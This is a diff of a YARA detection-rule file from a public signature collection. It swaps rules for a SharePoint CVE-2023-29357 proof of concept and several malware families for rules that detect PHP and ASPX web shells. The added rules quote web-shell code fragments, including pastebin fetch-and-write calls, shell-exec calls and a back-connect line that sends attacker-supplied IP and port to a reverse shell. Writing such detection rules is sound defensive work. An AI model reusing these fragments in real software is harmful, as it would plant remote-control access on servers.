+		id = "256051ed-da33-52b4-8bfb-ab990648d8fb"
+		date = "2015-01-13"
+		modified = "2025-11-03"
+		reference = "http://goo.gl/7dbyZs"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L9167-L9189"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "6837cba2637ed02d1d620c037b200d528c09a39498c1e320873a3a244e67932c"
-		score = 75
+		logic_hash = "e71429e9280c37a90ee77be888ae743a86521d3632afc4eeec480b82a22a1445"
+		score = 70
 		quality = 85
-		tags = "FILE"
-		hash1 = "71f70d61af00542b2e9ad64abd2dda7e437536ff"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$chartoi = {
-         8b 45 ?? // MOV EAX,dword ptr [EBP + ??]
-         c1 e0 07 // SHL EAX,0x7
-         89 c1 // MOV ECX,EAX
-         8b 55 ?? // MOV EDX,dword ptr [EBP + ??]
-         8b 45 ?? // MOV EAX,dword ptr [EBP + ??]
-         01 d0 // ADD EAX,EDX
-         0f b6 00 // MOVZX EAX,byte ptr [EAX]
-         0f be c0 // MOVSX EAX,AL
-         01 c8 // ADD EAX,ECX
-         89 45 ?? // MOV dword ptr [EBP + ??],EAX
-         83 6d ?? 01 // SUB dword ptr [EBP + ??],0x1
-      }
+		$s0 = "file_get_contents(\"http://pastebin.com" ascii
+		$s1 = "xcurl('http://pastebin.com/download.php" ascii
+		$s2 = "xcurl('http://pastebin.com/raw.php" ascii
+		$x0 = "if($content){unlink('evex.php');" ascii
+		$x1 = "$fh2 = fopen(\"evex.php\", 'a');" ascii
+		$y0 = "file_put_contents($pth" ascii
+		$y1 = "echo \"<login_ok>" ascii
+		$y2 = "str_replace('* @package Wordpress',$temp" ascii
 
 	condition:
-		uint32( 0 ) == 0x464c457f and all of them
+		1 of ( $s* ) or all of ( $x* ) or all of ( $y* )
 }
-rule SIGNATURE_BASE_LOG_EXPL_Sharepoint_CVE_2023_29357_Sep23_1 : CVE_2023_29357
+rule SIGNATURE_BASE_Aspxspy2
 {
 	meta:
-		description = "Detects log entries that could indicate a successful exploitation of CVE-2023-29357 on Microsoft SharePoint servers with the published Python POC"
-		author = "Florian Roth (with help from @LuemmelSec)"
-		id = "9fa77216-c0d6-55e5-bbcc-adb9438ca456"
-		date = "2023-09-28"
-		modified = "2023-10-01"
-		reference = "https://twitter.com/Gi7w0rm/status/1706764212704591953?s=20"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_sharepoint_cve_2023_29357.yar#L2-L20"
+		description = "Web shell - file ASPXspy2.aspx"
+		author = "Florian Roth (Nextron Systems)"
+		id = "b68e0c98-0136-58d8-a2d6-57abccb1e942"
+		date = "2015-01-24"
+		modified = "2025-11-03"
+		reference = "not set"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L9191-L9217"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "03e3a4715c8683dc8d03ad6720c1c9b40482bd0bfa3020aa1152565ec9ec929f"
-		score = 70
-		quality = 60
-		tags = "CVE-2023-29357"
+		hash = "5642387d92139bfe9ae11bfef6bfe0081dcea197"
+		logic_hash = "59c88f8e2542dcde4bf5123147ea2c1ca408925ca966f3f34a4692a3ba7a0935"
+		score = 75
+		quality = 85
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$xr1 = /GET [a-z\.\/_]{0,40}\/web\/(siteusers|currentuser) - (80|443) .{10,200} (python-requests\/[0-9\.]{3,8}|-) [^ ]{1,160} [^4]0[0-9] /
+		$s0 = "string iVDT=\"-SETUSERSETUP\\r\\n-IP=0.0.0.0\\r\\n-PortNo=52521\\r\\n-User=bin" ascii
+		$s1 = "SQLExec : <asp:DropDownList runat=\"server\" ID=\"FGEy\" AutoPostBack=\"True\" O" ascii
+		$s3 = "Process[] p=Process.GetProcesses();" fullword ascii
+		$s4 = "Response.Cookies.Add(new HttpCookie(vbhLn,Password));" fullword ascii
+		$s5 = "[DllImport(\"kernel32.dll\",EntryPoint=\"GetDriveTypeA\")]" fullword ascii
+		$s6 = "<p>ConnString : <asp:TextBox id=\"MasR\" style=\"width:70%;margin:0 8px;\" CssCl" ascii
+		$s7 = "ServiceController[] kQmRu=System.ServiceProcess.ServiceController.GetServices();" fullword ascii
+		$s8 = "Copyright &copy; 2009 Bin -- <a href=\"http://www.rootkit.net.cn\" target=\"_bla" ascii
+		$s10 = "Response.AddHeader(\"Content-Disposition\",\"attachment;filename=\"+HttpUtility." ascii
+		$s11 = "nxeDR.Command+=new CommandEventHandler(this.iVk);" fullword ascii
+		$s12 = "<%@ import Namespace=\"System.ServiceProcess\"%>" fullword ascii
+		$s13 = "foreach(string innerSubKey in sk.GetSubKeyNames())" fullword ascii
+		$s17 = "Response.Redirect(\"http://www.rootkit.net.cn\");" fullword ascii
+		$s20 = "else if(Reg_Path.StartsWith(\"HKEY_USERS\"))" fullword ascii
 
 	condition:
-		$xr1
+		6 of them
 }
-rule SIGNATURE_BASE_HKTL_EXPL_POC_PY_Sharepoint_CVE_2023_29357_Sep23_1 : CVE_2023_29357 FILE
+rule SIGNATURE_BASE_Webshell_27_9_C66_C99 : FILE
 {
 	meta:
-		description = "Detects a Python POC to exploit CVE-2023-29357 on Microsoft SharePoint servers"
-		author = "Florian Roth"
-		id = "2be524ab-f360-56b8-9ce3-e15036855c67"
-		date = "2023-10-01"
-		modified = "2023-10-01"
-		reference = "https://github.com/Chocapikk/CVE-2023-29357"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_sharepoint_cve_2023_29357.yar#L22-L35"
+		description = "Detects Webshell - rule generated from from files 27.9.txt, c66.php, c99-shadows-mod.php, c99.php ..."
+		author = "Florian Roth (Nextron Systems)"
+		id = "4b985ae7-1ae6-5976-9e8d-0d6b5faed75b"
+		date = "2016-01-11"
+		modified = "2025-11-03"
+		reference = "https://github.com/nikicat/web-malware-collection"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L9228-L9253"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "fec7762ab23ba5ee9e793000d080b1d64b93157c6ead9e6939ccfb3c168dd360"
-		score = 80
+		logic_hash = "71ae0a3843151a2eec913f62167b23cf9e0c759b18ebe0759174d3503fb23717"
+		score = 70
 		quality = 85
-		tags = "CVE-2023-29357, FILE"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "2b8aed49f50acd0c1b89a399647e1218f2a8545da96631ac0882da28810eecc4"
+		hash2 = "5d7709a33879d1060a6cff5bae119de7d5a3c17f65415822fd125af56696778c"
+		hash3 = "c377f9316a4c953602879eb8af1fd7cbb0dd35de6bb4747fa911234082c45596"
+		hash4 = "80ec7831ae888d5603ed28d81225ed8b256c831077bb8feb235e0a1a9b68b748"
+		hash5 = "6ce99e07aa98ba6dc521c34cf16fbd89654d0ba59194878dffca857a4c34e57b"
+		hash6 = "383d771b55bbe5343bab946fd7650fd42de1933c4c8f32449d9a40c898444ef1"
+		hash7 = "07f9ec716fb199e00a90091ffba4c2ee1a328a093a64e610e51ab9dd6d33357a"
+		hash8 = "615e768522447558970c725909e064558f33d38e6402c63c92a1a8bc62b64966"
+		hash9 = "ef3a7cd233a880fc61efc3884f127dd8944808babd1203be2400144119b6057f"
+		hash10 = "a4db77895228f02ea17ff48976e03100ddfaef7c9f48c1d40462872f103451d5"
 
 	strings:
-		$x1 = "encoded_payload = base64.urlsafe_b64encode(json.dumps(payload).encode()).rstrip(b'=')"
+		$s4 = "if (!empty($unset_surl)) {setcookie(\"c99sh_surl\"); $surl = \"\";}" fullword ascii
+		$s6 = "@extract($_REQUEST[\"c99shcook\"]);" fullword ascii
+		$s7 = "if (!function_exists(\"c99_buff_prepare\"))" fullword ascii
 
 	condition:
-		filesize < 30KB and $x1
+		filesize < 685KB and 1 of them
 }
-rule SIGNATURE_BASE_HKTL_EXPL_POC_NET_Sharepoint_CVE_2023_29357_Sep23_1 : CVE_2023_29357 FILE
+rule SIGNATURE_BASE_Webshell_Acid_Antisecshell_3 : FILE
 {
 	meta:
-		description = "Detects a C# POC to exploit CVE-2023-29357 on Microsoft SharePoint servers"
-		author = "Florian Roth"
-		id = "aa6aeb00-b162-538c-a670-cbff525dd8f1"
-		date = "2023-10-01"
-		modified = "2023-12-05"
-		reference = "https://github.com/LuemmelSec/CVE-2023-29357"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_sharepoint_cve_2023_29357.yar#L37-L62"
+		description = "Detects Webshell Acid"
+		author = "Florian Roth (Nextron Systems)"
+		id = "68d59f1e-ef35-586b-805d-1e6e3548d092"
+		date = "2016-01-11"
+		modified = "2025-11-03"
+		reference = "https://github.com/nikicat/web-malware-collection"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L9255-L9287"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "cf621cc9c5074f531df61623b09db68478e94ae6a9a7acc26aa8d9dde79bd30c"
-		score = 80
+		logic_hash = "c8c3fcde7afdafe8ead59e24e432fdd4ccae99f96f67b4be3e5a9cd74ff9b2e7"
+		score = 70
 		quality = 85
-		tags = "CVE-2023-29357, FILE"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "2b8aed49f50acd0c1b89a399647e1218f2a8545da96631ac0882da28810eecc4"
+		hash2 = "7a69466dbd18182ce7da5d9d1a9447228dcebd365e0fe855d0e02024f4117549"
+		hash3 = "0202f72b3e8b62e5ebc99164c7d4eb8ec5be6a7527286e9059184aa8321e0092"
+		hash4 = "d4424c61fe29d2ee3d8503f7d65feb48341ac2fc0049119f83074950e41194d5"
+		hash5 = "5d7709a33879d1060a6cff5bae119de7d5a3c17f65415822fd125af56696778c"
+		hash6 = "21dd06ec423f0b49732e4289222864dcc055967922d0fcec901d38a57ed77f06"
+		hash7 = "c377f9316a4c953602879eb8af1fd7cbb0dd35de6bb4747fa911234082c45596"
+		hash8 = "816e699014be9a6d02d5d184eb958c49469d687b7c6fb88e878bca64688a19c9"
+		hash9 = "383d771b55bbe5343bab946fd7650fd42de1933c4c8f32449d9a40c898444ef1"
+		hash10 = "07f9ec716fb199e00a90091ffba4c2ee1a328a093a64e610e51ab9dd6d33357a"
+		hash11 = "615e768522447558970c725909e064558f33d38e6402c63c92a1a8bc62b64966"
+		hash12 = "bbe0f7278041cb3a6338844aa12c3df6b700a12a78b0a58bce3dce14f1c37b96"
+		hash13 = "d0edca7539ef2d30f0b3189b21a779c95b5815c1637829b5594e2601e77cb4dc"
+		hash14 = "65e7edf10ffb355bed81b7413c77d13d592f63d39e95948cdaea4ea0a376d791"
+		hash15 = "ef3a7cd233a880fc61efc3884f127dd8944808babd1203be2400144119b6057f"
+		hash16 = "ba87d26340f799e65c771ccb940081838afe318ecb20ee543f32d32db8533e7f"
+		hash17 = "a4db77895228f02ea17ff48976e03100ddfaef7c9f48c1d40462872f103451d5"
+		hash18 = "1fdf6e142135a34ae1caf1d84adf5e273b253ca46c409b2530ca06d65a55ecbd"
 
 	strings:
-		$x1 = "{f22d2de0-606b-4d16-98d5-421f3f1ba8bc}" ascii wide
-		$x2 = "{F22D2DE0-606B-4D16-98D5-421F3F1BA8BC}" ascii wide
-		$s1 = "Bearer"
-		$s2 = "hashedprooftoken"
-		$s3 = "/_api/web/"
-		$s4 = "X-PROOF_TOKEN"
-		$s5 = "00000003-0000-0ff1-ce00-000000000000"
-		$s6 = "IsSiteAdmin"
+		$s0 = "echo \"<option value=delete\".($dspact == \"delete\"?\" selected\":\"\").\">Delete</option>\";" fullword ascii
+		$s1 = "if (!is_readable($o)) {return \"<font color=red>\".view_perms(fileperms($o)).\"</font>\";}" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 800KB and ( 1 of ( $x* ) or all of ( $s* ) )
+		filesize < 900KB and all of them
 }
-rule SIGNATURE_BASE_APT_Equation_Group_Op_Triangulation_Triangledb_Implant_Jun23_1 : FILE
+rule SIGNATURE_BASE_Webshell_C99_4 : FILE
 {
 	meta:
-		description = "Detects TriangleDB implant found being used in Operation Triangulation on iOS devices (maybe also used on macOS systems)"
-		author = "Florian Roth"
-		id = "d81a5103-41c8-5dba-a560-8fb5514f6c0a"
-		date = "2023-06-21"
-		modified = "2023-12-05"
-		reference = "https://securelist.com/triangledb-triangulation-implant/110050/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_triangulation_jun23.yar#L2-L18"
+		description = "Detects C99 Webshell"
+		author = "Florian Roth (Nextron Systems)"
+		id = "d5035906-df17-5149-92ae-51e6ec05996e"
+		date = "2016-01-11"
+		modified = "2025-11-03"
+		reference = "https://github.com/nikicat/web-malware-collection"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L9289-L9320"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "486b19ddb8b182dbba882359f7eb416735e76f9cda5aea1b290fb5c6b44960c5"
-		score = 80
+		logic_hash = "fa095d8da737e24a913eeadaca2882475366bf5cf0911dd9ff44aaa04871cc0f"
+		score = 70
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "2b8aed49f50acd0c1b89a399647e1218f2a8545da96631ac0882da28810eecc4"
+		hash2 = "0202f72b3e8b62e5ebc99164c7d4eb8ec5be6a7527286e9059184aa8321e0092"
+		hash3 = "d4424c61fe29d2ee3d8503f7d65feb48341ac2fc0049119f83074950e41194d5"
+		hash4 = "5d7709a33879d1060a6cff5bae119de7d5a3c17f65415822fd125af56696778c"
+		hash5 = "21dd06ec423f0b49732e4289222864dcc055967922d0fcec901d38a57ed77f06"
+		hash6 = "c377f9316a4c953602879eb8af1fd7cbb0dd35de6bb4747fa911234082c45596"
+		hash7 = "816e699014be9a6d02d5d184eb958c49469d687b7c6fb88e878bca64688a19c9"
+		hash8 = "383d771b55bbe5343bab946fd7650fd42de1933c4c8f32449d9a40c898444ef1"
+		hash9 = "07f9ec716fb199e00a90091ffba4c2ee1a328a093a64e610e51ab9dd6d33357a"
+		hash10 = "615e768522447558970c725909e064558f33d38e6402c63c92a1a8bc62b64966"
+		hash11 = "bbe0f7278041cb3a6338844aa12c3df6b700a12a78b0a58bce3dce14f1c37b96"
+		hash12 = "ef3a7cd233a880fc61efc3884f127dd8944808babd1203be2400144119b6057f"
+		hash13 = "a4db77895228f02ea17ff48976e03100ddfaef7c9f48c1d40462872f103451d5"
+		hash14 = "1fdf6e142135a34ae1caf1d84adf5e273b253ca46c409b2530ca06d65a55ecbd"
 
 	strings:
-		$s1 = "unmungeHexString" ascii fullword
-		$s2 = "CRPwrInfo" ascii fullword
-		$s3 = "CRConfig" ascii fullword
-		$s4 = "CRXConfigureDBServer" ascii fullword
+		$s1 = "displaysecinfo(\"List of Attributes\",myshellexec(\"lsattr -a\"));" fullword ascii
+		$s2 = "displaysecinfo(\"RAM\",myshellexec(\"free -m\"));" fullword ascii
+		$s3 = "displaysecinfo(\"Where is perl?\",myshellexec(\"whereis perl\"));" fullword ascii
+		$s4 = "$ret = myshellexec($handler);" fullword ascii
+		$s5 = "if (posix_kill($pid,$sig)) {echo \"OK.\";}" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0xfacf and filesize < 30MB and $s1 and 2 of them ) or all of them
+		filesize < 900KB and 1 of them
 }
-rule SIGNATURE_BASE_Malware_Floxif_Mpsvc_Dll : HIGHVOL FILE
+rule SIGNATURE_BASE_Webshell_R57Shell_2 : FILE
 {
 	meta:
-		description = "Malware - Floxif"
+		description = "Detects Webshell R57"
 		author = "Florian Roth (Nextron Systems)"
-		id = "37af366a-24b2-5402-b0b5-6e2c80f8c903"
-		date = "2017-04-07"
-		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_floxif.yar#L2-L17"
+		id = "f2298430-1eff-5ed2-abee-3b26b36d16b7"
+		date = "2016-01-11"
+		modified = "2025-11-03"
+		reference = "https://github.com/nikicat/web-malware-collection"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L9322-L9349"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "e51258558dfd9a2c65589100a224492f4582067484c99d405b2d432a48cc6ed8"
-		score = 75
+		logic_hash = "2af51c3d181801b14d5dbb3107cd78cf7ab4a590b7967f231ec707b7ee03fa26"
+		score = 70
 		quality = 85
-		tags = "HIGHVOL, FILE"
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "1e654ee1c4736f4ccb8b5b7aa604782cfb584068df4d9e006de8009e60ab5a14"
+		hash1 = "e46777e5f1ac1652db3ce72dd0a2475ea515b37a737fffd743126772525a47e6"
+		hash2 = "aa957ca4154b7816093d667873cf6bdaded03f820e84d8f1cd5ad75296dd5d4d"
+		hash3 = "aa957ca4154b7816093d667873cf6bdaded03f820e84d8f1cd5ad75296dd5d4d"
+		hash4 = "756b788401aad4bfd4dbafd15c382d98e3ba079390addb5b0cea7ff7f985f881"
+		hash5 = "756b788401aad4bfd4dbafd15c382d98e3ba079390addb5b0cea7ff7f985f881"
+		hash6 = "16b6ec4b80f404f4616e44d8c21978dcdad9f52c84d23ba27660ee8e00984ff2"
+		hash7 = "59105e4623433d5bf93b9e17d72a43a40a4d8ac99e4a703f1d8851ad1276cd88"
+		hash8 = "1db0549066f294f814ec14ba4e9f63d88c4460d68477e5895236173df437d2b8"
+		hash9 = "c6a5148c81411ec9200810619fa5eec6616800a4d76c988431c272bc8679254f"
+		hash10 = "c6a5148c81411ec9200810619fa5eec6616800a4d76c988431c272bc8679254f"
+		hash11 = "59ea6cf16ea06ff47cf0e6a398df2eaec4d329707b8c3201fc63cbf0b7c85519"
+		hash12 = "0e0227a0001b38fb59fc07749e80c9d298ff0e6aca126ea8f4ea68ebc9a3661f"
+		hash13 = "ef74644065925aa8d64913f5f124fe73d8d289d5f019a104bf5f56689f49ba92"
 
 	strings:
-		$op1 = { 04 80 7a 03 01 75 04 8d 42 04 c3 8d 42 04 53 8b }
-		$op2 = { 88 19 74 03 41 eb ea c6 42 03 01 5b c3 8b 4c 24 }
-		$op3 = { ff 03 8d 00 f9 ff ff 88 01 eb a1 }
+		$s1 = "$connection = @ftp_connect($ftp_server,$ftp_port,10);" fullword ascii
+		$s2 = "echo $lang[$language.'_text98'].$suc.\"\\r\\n\";" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 1000KB and all of them )
+		filesize < 900KB and all of them
 }
-rule SIGNATURE_BASE_Gen_Unicorn_Obfuscated_Powershell : FILE
+rule SIGNATURE_BASE_Webshell_27_9_Acid_C99_Locus7S : FILE
 {
 	meta:
-		description = "PowerShell payload obfuscated by Unicorn toolkit"
-		author = "John Lambert @JohnLaTwC"
-		id = "0235795b-6d0b-5bba-8ae6-606c3b613c86"
-		date = "2018-04-03"
-		modified = "2023-12-05"
-		reference = "https://github.com/trustedsec/unicorn/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_unicorn_obfuscated_powershell.yar#L1-L26"
+		description = "Detects Webshell - rule generated from from files 27.9.txt, acid.php, c99_locus7s.txt"
+		author = "Florian Roth (Nextron Systems)"
+		id = "f5f33b64-b815-5e32-8d2e-5e455651ec5d"
+		date = "2016-01-11"
+		modified = "2025-11-03"
+		reference = "https://github.com/nikicat/web-malware-collection"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L9351-L9373"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "b93d2fe6a671a6a967f31d5b3a0a16d4f93abcaf25188a2bbdc0894087adb10d"
-		logic_hash = "cb0044d5ee146213c96161d52880ce6c20d5884d57620c73f359673d4ae4b76b"
-		score = 75
+		logic_hash = "3005c09dfcb1f2e33a09ed73e28ef889c74e1f5daf619dd272e0b9b30cdb0f94"
+		score = 70
 		quality = 85
 		tags = "FILE"
-		hash2 = "1afb9795cb489abce39f685a420147a2875303a07c32bf7eec398125300a460b"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "2b8aed49f50acd0c1b89a399647e1218f2a8545da96631ac0882da28810eecc4"
+		hash2 = "7a69466dbd18182ce7da5d9d1a9447228dcebd365e0fe855d0e02024f4117549"
+		hash3 = "960feb502f913adff6b322bc9815543e5888bbf9058ba0eb46ceb1773ea67668"
+		hash4 = "07f9ec716fb199e00a90091ffba4c2ee1a328a093a64e610e51ab9dd6d33357a"
+		hash5 = "bbe0f7278041cb3a6338844aa12c3df6b700a12a78b0a58bce3dce14f1c37b96"
+		hash6 = "5ae121f868555fba112ca2b1a9729d4414e795c39d14af9e599ce1f0e4e445d3"
+		hash7 = "ef3a7cd233a880fc61efc3884f127dd8944808babd1203be2400144119b6057f"
+		hash8 = "ba87d26340f799e65c771ccb940081838afe318ecb20ee543f32d32db8533e7f"
 
 	strings:
-		$h1 = "powershell"
-		$sa1 = ".value.toString() 'JAB"
-		$sa2 = ".value.toString() ('JAB"
-		$sb1 = "-w 1 -C \"s"
-		$sb2 = "/w 1 /C \"s"
+		$s0 = "$blah = ex($p2.\" /tmp/back \".$_POST['backconnectip'].\" \".$_POST['backconnectport'].\" &\");" fullword ascii
+		$s1 = "$_POST['backcconnmsge']=\"</br></br><b><font color=red size=3>Error:</font> Can't backdoor host!</b>\";" fullword ascii
 
 	condition:
-		filesize < 20KB and uint32be( 0 ) == 0x706f7765 and $h1 at 0 and ( uint16be( filesize -2 ) == 0x2722 or ( uint16be( filesize -2 ) == 0x220a and uint8( filesize -3 ) == 0x27 ) or ( uint16be( filesize -2 ) == 0x2922 and uint8( filesize -3 ) == 0x27 ) ) and ( 1 of ( $sa* ) and 1 of ( $sb* ) )
+		filesize < 1711KB and 1 of them
 }
-rule SIGNATURE_BASE_VULN_PUA_GIGABYTE_Driver_Jul22_1 : FILE
+rule SIGNATURE_BASE_Webshell_Backdoor_PHP_Agent_R57_Mod_Bizzz_Shell_R57 : FILE
 {
 	meta:
-		description = "Detects a vulnerable GIGABYTE driver sometimes used by malicious actors to escalate privileges"
+		description = "Detects Webshell - rule generated from from files Backdoor.PHP.Agent.php, r57.mod-bizzz.shell.txt ..."
 		author = "Florian Roth (Nextron Systems)"
-		id = "c66b858f-a034-53e1-b0fd-e48693fc6913"
-		date = "2022-07-25"
-		modified = "2023-12-05"
-		reference = "https://twitter.com/malmoeb/status/1551449425842786306"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/vuln_gigabyte_driver.yar#L2-L28"
+		id = "00d3159c-f5d2-5b49-9499-3bb938776858"
+		date = "2016-01-11"
+		modified = "2025-11-03"
+		reference = "https://github.com/nikicat/web-malware-collection"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L9375-L9400"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "8aeae559b52b8e01ceab8caba24653b949b3bec694a14b36c819b0a7c9f8b7c6"
-		score = 65
+		logic_hash = "51660ea25d1b2290c0ca30377dbf378cac8d7b7650603f1dbe5b7914c530d5cf"
+		score = 70
 		quality = 85
 		tags = "FILE"
-		hash1 = "31f4cfb4c71da44120752721103a16512444c13c2ac2d857a7e6f13cb679b427"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "e46777e5f1ac1652db3ce72dd0a2475ea515b37a737fffd743126772525a47e6"
+		hash2 = "f51a5c5775d9cca0b137ddb28ff3831f4f394b7af6f6a868797b0df3dcdb01ba"
+		hash3 = "16b6ec4b80f404f4616e44d8c21978dcdad9f52c84d23ba27660ee8e00984ff2"
+		hash4 = "59105e4623433d5bf93b9e17d72a43a40a4d8ac99e4a703f1d8851ad1276cd88"
+		hash5 = "6dc417db9e07420a618d44217932ca8baf3541c08d5e68281e1be10af4280e4a"
+		hash6 = "5d07fdfee2dc6d81da26f05028f79badd10dec066909932129d398627b2f4e94"
+		hash7 = "1db0549066f294f814ec14ba4e9f63d88c4460d68477e5895236173df437d2b8"
+		hash8 = "c6a5148c81411ec9200810619fa5eec6616800a4d76c988431c272bc8679254f"
+		hash9 = "59ea6cf16ea06ff47cf0e6a398df2eaec4d329707b8c3201fc63cbf0b7c85519"
+		hash10 = "0e0227a0001b38fb59fc07749e80c9d298ff0e6aca126ea8f4ea68ebc9a3661f"
+		hash11 = "ef74644065925aa8d64913f5f124fe73d8d289d5f019a104bf5f56689f49ba92"
 
 	strings:
-		$xc1 = { 00 46 00 69 00 6C 00 65 00 56 00 65 00 72 00 73
-               00 69 00 6F 00 6E 00 00 00 00 00 35 00 2E 00 32
-               00 2E 00 33 00 37 00 39 00 30 00 2E 00 31 00 38
-               00 33 00 30 00 20 00 62 00 75 00 69 00 6C 00 74
-               00 20 00 62 00 79 00 3A 00 20 00 57 00 69 00 6E
-               00 44 00 44 00 4B 00 00 00 00 00 32 00 09 00 01
-               00 49 00 6E 00 74 00 65 00 72 00 6E 00 61 00 6C
-               00 4E 00 61 00 6D 00 65 00 00 00 67 00 64 00 72
-               00 76 00 2E 00 73 00 79 00 73 }
-		$x1 = "AEYAaQBsAGUAVgBlAHIAcwBpAG8AbgAAAAAANQAuADIALgAzADcAOQAwAC4AMQA4ADMAMAAgAGIAdQBpAGwAdAAgAGIAeQA6ACAAVwBpAG4ARABEAEsAAAAAADIACQABAEkAbgB0AGUAcgBuAGEAbABOAGEAbQBlAAAAZwBkAHIAdgAuAHMAeQBz"
-		$x2 = "BGAGkAbABlAFYAZQByAHMAaQBvAG4AAAAAADUALgAyAC4AMwA3ADkAMAAuADEAOAAzADAAIABiAHUAaQBsAHQAIABiAHkAOgAgAFcAaQBuAEQARABLAAAAAAAyAAkAAQBJAG4AdABlAHIAbgBhAGwATgBhAG0AZQAAAGcAZAByAHYALgBzAHkAc"
-		$x3 = "ARgBpAGwAZQBWAGUAcgBzAGkAbwBuAAAAAAA1AC4AMgAuADMANwA5ADAALgAxADgAMwAwACAAYgB1AGkAbAB0ACAAYgB5ADoAIABXAGkAbgBEAEQASwAAAAAAMgAJAAEASQBuAHQAZQByAG4AYQBsAE4AYQBtAGUAAABnAGQAcgB2AC4AcwB5AH"
+		$s1 = "$_POST['cmd'] = which('" ascii
+		$s2 = "$blah = ex(" ascii
 
 	condition:
-		filesize < 4000KB and 1 of them
+		filesize < 600KB and all of them
 }
-rule SIGNATURE_BASE_Minidionis_Readerview : FILE
+rule SIGNATURE_BASE_Webshell_C100 : FILE
 {
 	meta:
-		description = "MiniDionis Malware - file readerView.exe / adobe.exe"
+		description = "Detects Webshell - rule generated from from files c100 v. 777shell"
 		author = "Florian Roth (Nextron Systems)"
-		id = "dc8d4311-2a87-5c9b-95ff-52708f293f01"
-		date = "2015-07-20"
-		modified = "2023-12-05"
-		reference = "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3950"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_minidionis.yar#L10-L35"
+		id = "aa8317ff-680d-5b60-b8a9-a77ea58f0ed0"
+		date = "2016-01-11"
+		modified = "2025-11-03"
+		reference = "https://github.com/nikicat/web-malware-collection"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L9402-L9426"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "45ae1be675f2b7b3d89aea2bde66f9f96b55b6fbf81e3783c209c7d6d4355026"
-		score = 75
+		logic_hash = "cc8c59f70f5ec6c89812b1597e9b864e358593ea5782e359cd483dee1a84b28b"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "ee5eb9d57c3611e91a27bb1fc2d0aaa6bbfa6c69ab16e65e7123c7c49d46f145"
-		hash2 = "a713982d04d2048a575912a5fc37c93091619becd5b21e96f049890435940004"
